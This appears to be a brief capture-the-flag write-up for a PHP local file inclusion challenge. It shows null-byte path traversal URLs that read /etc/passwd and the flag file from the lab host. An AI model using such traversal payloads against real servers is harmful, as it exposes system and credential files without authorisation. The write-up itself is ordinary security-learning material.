

When clicking on one of the reference links, the url changes:
`jh2i.com:50010/?page=bit`
Looks to be pulling the page from the server. Check for LFI

No dice there. Let's append a null byte and see what happens
`http://jh2i.com:50010/?page=../../../etc/passwd%00`

There we go
`http://jh2i.com:50010/?page=../../../flag.txt%00`

---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #file_inclusion #lfi #php #nullbyte #web
Related: